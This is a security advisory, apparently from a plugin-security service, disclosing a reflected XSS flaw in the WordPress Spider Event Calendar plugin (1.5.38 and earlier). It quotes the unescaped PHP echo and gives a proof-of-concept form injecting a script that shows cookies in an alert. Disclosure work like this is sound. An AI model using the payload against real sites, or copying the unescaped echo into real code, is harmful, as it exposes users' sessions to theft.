04 Apr

Reflected Cross-Site Scripting (XSS) Vulnerability in WordPress Event Calendar (Spider Event Calendar)

We recently discovered the WordPress Event Calendar (Spider Event Calendar) plugin had a reflected cross-site scripting (XSS) vulnerability. In version 1.5.38, and all previous versions, the file /nav_function/nav_html_func.php was echoing a POST variable without escaping it. That occurred on line 88:

<input type="hidden" id="serch_or_not" name="serch_or_not" value="<?php if(isset($_POST["serch_or_not"])){ echo $_POST["serch_or_not"];}  ?>"    />

Proof Of Concept

The following proof of concept page will cause any available cookies to shown in alert box. Major web browsers other than Firefox provide XSS filtering so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=SpiderCalendar" method="post">
<input type="hidden" name="serch_or_not" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 4/1/2016 – Developer notified.
  • 4/2/2016 – Version 1.5.39 released, which fixes vulnerability.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *